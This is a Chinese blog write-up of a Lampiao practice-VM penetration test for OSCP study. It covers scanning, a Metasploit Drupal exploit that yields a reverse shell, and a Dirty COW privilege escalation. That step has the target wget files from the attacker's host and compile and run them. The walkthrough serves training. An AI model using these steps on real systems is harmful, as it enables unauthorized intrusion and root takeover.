OSCP Lampiao 靶机渗透

最新推荐文章于 2024-07-25 13:13:29 发布
最新推荐文章于 2024-07-25 13:13:29 发布
阅读量687 收藏 5
点赞数 1
分类专栏: OSCP 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34935231/article/details/115079914
版权

Lampiao 靶机渗透

目标:得到root权限
作者:shadow
时间:2021-03-22

请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

netdiscover -i eth0

Lampiao主机ip为172.16.1.15

nmap扫下所有端口

nmap -p- -A 172.16.1.15

看下有两个http,看下80端口,就这样一个东西,查看源代码也没有,估计是修改了默认端口

我们再看下1898端口

是个登录页面,我们dirb下看看目录下有什么

dirb http://172.16.1.15:1898

发现了robots.txt,我们看看写了什么,原来是一个访问控制列表,我们在这里发现了敏感文件CHANGELOG.txt,更新日志

查看更新日志,发现是Drupal的

二、web渗透

我们使用msf查看下是否有渗透脚本

msfconsole

search Drupal

使用这个漏洞

配置成如下然后直接run

成功反弹shell,我们改为交互式shell

python -c 'import pty;pty.spawn("/bin/sh")'

三、提权

我们试试自动检测,看看有没有直接提权的exploiot

在/var/www/html目录下下载exploit suggester

git clone https://github.com/mzet-/linux-exploit-suggester

mv linux-exploit-suggester.sh ..

开启服务

service apache2 start

然后使用受害机下载

wget http://172.16.1.4/linux-exploit-suggester.sh

赋予执行权限并运行

chmod +x linux-exploit-suggester.sh

./linux-exploit-suggester.sh

发现可能存在的漏洞dirtycow

网上搜索找到exploit 40847

由于是c++文件,我们将下载代码保存为lampiao.cpp

然后移动文件到我们的apache2文件夹下

mv lampiao /var/www/html

受害机下载我们的文件

wget http://172.16.1.4/lampiao.cpp

然后进行编译

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow lampiao.cpp -lutil

赋予执行权限

chmod +x dcow

执行,成功获得root密码

./dcow

切换到root用户输入密码,成功获得root权限

四、总结

这次靶机没什么难度,主要是尝试msf时候花费了点时间

 

c2hhZG93
关注
专栏目录
oscp raven2靶机渗透过程
shatianyzg的博客
07-05 370
信息侦察阶段 用dirb扫描发现以下信息 ---- Entering directory: http://172.16.100.142/vendor/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode ‘-w’ if you want to scan it anyway) 找到第一个flag 寻找PHPMailer 5.2.16 的exp searchsploit phpmailer 拷贝exp到当前目录利用40
OSCP-Vulnhub靶机记录-digitalworldlocal-fall
深入交流学习:webMsec
09-30 274
-hh 隐藏char值为80的结果(错误的参数都这里报80,第一次wfuzz没有加此参数)尝试用读取/home/qiu目录下默认存ssh密钥文件,通过前面扫描端口知道他是开了ssh的。vulnhub和htb有很多为OSCP准备的靶机,都可以打一打。再回leafpad,搜索一下“enum”,看看枚举出什么目录。复制保存到攻击机,key文件最后要有一个回车,否则登录不上去。这里的GET参数是 file,可以尝试文件包含。那么,我们可以试一下,用哪个参数可以拼接进去。ls 一下,提示我们是低权限用户。
OSCP IMF 靶机渗透
Shadow的博客
03-16 873
IMF 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-03-16 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 netdiscover -i eth0 imf主机ip为172.16.1.13 然后我们nmap一下看看哪些端口是开放的 nmap -p- -A 172.16.1.13 主机只开放了80端口,登录浏览
OSCP认证深度解析:定义、实现、应用场景与优缺点评估
kiingking的博客
07-13 522
OSCP是Offensive Security提供的一个专业级别的道德黑客认证。它是针对渗透测试的专业认证,旨在验证个人在实际环境中进行渗透测试的能力。与其他理论导向的认证不同,OSCP侧重于实践技能和真实世界情景的模拟。OSCP认证是渗透测试领域的黄金标准之一,它不仅证明了个人在该领域的专业技能,也是职业生涯中重要的里程碑。然而,获得认证需要充分的准备和持续的努力。
OSCP  Raven 靶机渗透
Shadow的博客
04-01 321
Raven靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-01 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 netdiscover -i eth0 Raven主机ip为172.16.1.17 nmap 查询开放端口 nmap -p- -A 172.16.1.17 查询到主机开放了80端口,打开浏览器看.
vulnhub——oscp靶机
Re1_zf的博客
10-21 958
即使用这些命令从/目录中查找具有SUID权限位且属主为root的文件并将其输出,然后将所有错误重定向到/dev/null,使用find / -user root -perm -4000 -print 2>/dev/null。相比来说,我比较喜欢直接使用nmap对C段进行扫描,直接就把相关信息也扫描出来了,比较方便。前提是知道靶机跟自己在同一C段,这里用的是虚拟机NAT模式,所以可以知道必然在同一C段下。这里其实省了目录扫描的工作了已经,脚本检测发现80端口下有一个secret.txt文件。
Vulnhub-OSCP靶机实战
御七彩虹猫
05-10 2356
Vulnhub-OSCP靶机实战
oscp靶机教程
weixin_68723119的博客
08-13 415
1.使用命令 arp-scan -l 列出当前局域网的所有设备,在oscp的网络适配器查看到的mac地址和扫描出来的192.168.211.141的MAC地址一致。先找一下有哪些我们可以利用的了,目前我们的用户是普通用户可以通过find命令找找一些特权命令,借助它可以从普通用户提升为root。找网站使用base64对内容进行解密,好家伙,是ssh连接私钥,找到宝了。只有一个用户“oscp”,要么它就是root,要么就是它是唯二用户。看到了bash,很亲切,去gtfobin搜索一下提权方法。
oscp推荐的训练靶机raven2渗透过程
07-05
OSCP 训练靶机 Raven2 渗透过程详解 OSCP( Offensive Security Certified Professional)是 Offensive Security 公司提供的渗透测试认证,旨在验证个人的渗透测试技能。Raven2 是 OSCP 认证考试中的一个训练靶机,...
Vulnhub: InfoSec Prep:OSCP靶机
qq_43884092的博客
05-07 731
secret.txt获得ssh私钥,suid提权
1-OSCP自学笔记-October靶机练习1
08-04
【OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
oscp
03-26
oscp
OSCP靶机练习--CuteNews01
一杯咖啡的渗透记忆
05-19 1691
靶机地址:BBS (cute): 1.0.2 ~ VulnHub 靶机环境搭建: 个人本地环境:VMWare已经安装好了,因为虚拟机镜像是virtualBox的.vbox结尾,所以在本地又安装了VitualBox VMWare和VitualBox的NAT网络不能同时使用, 整了半天也没搞起来,后来才知道这两种虚拟程序不能同时使用NAT。 所以使用了另外一台Kali的机器,直接用主机来测了。靶机本地用VirtualBox安装靶机。 但因为不在同一台机器上面,所以才用的是桥接的方式链接,如下:
OSCP Mr. Robot 靶机渗透
Shadow的博客
03-12 1251
Mr. Robot 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-03-12
# 【oscp系列】靶机1
weixin_44807430的博客
01-15 842
快速打通靶机
OSCP - 6Days_Lab-v1.0.1靶机
小小猪的博客
06-09 386
OSCP - 6Days_Lab-v1.0.1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.232 访问 http://x.x.x.232 输入折扣码,提示代码过期,没啥用处 查看页面源码 访问,得到出错,可能存在ssrf 修改src=后边参数为index.php,并没有拦截,也没有报错 使用dirb http://x.x.x.232,获取靶机网站目录结构文件 打开BP进行抓包,发现响应包是主页界面,访.
类OSCP靶机-Kioptix Level 2
ETO发展中心
08-02 448
同步发布:https://www.youi.xin/?p=449 1.信息收集 环境部署可参考上一篇https://www.youi.xin/?p=435 通过对c段扫描发现了靶机ip,nmap扫描目标端口信息如下: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99) | ssh-hostkey: | 1024 8f:3e:8b:1e:58:63:fe:cf:27:a.
【OSCP系列】OSCP靶机-LemonSqueezy(原创)
最新发布
Lusen的博客
07-25 667
OSCP系列-LemonSqueezy靶场做题记录
【oscp系列-Tr0ll-1】靶机4
weixin_44807430的博客
01-16 545
知行合一
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

c2hhZG93

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值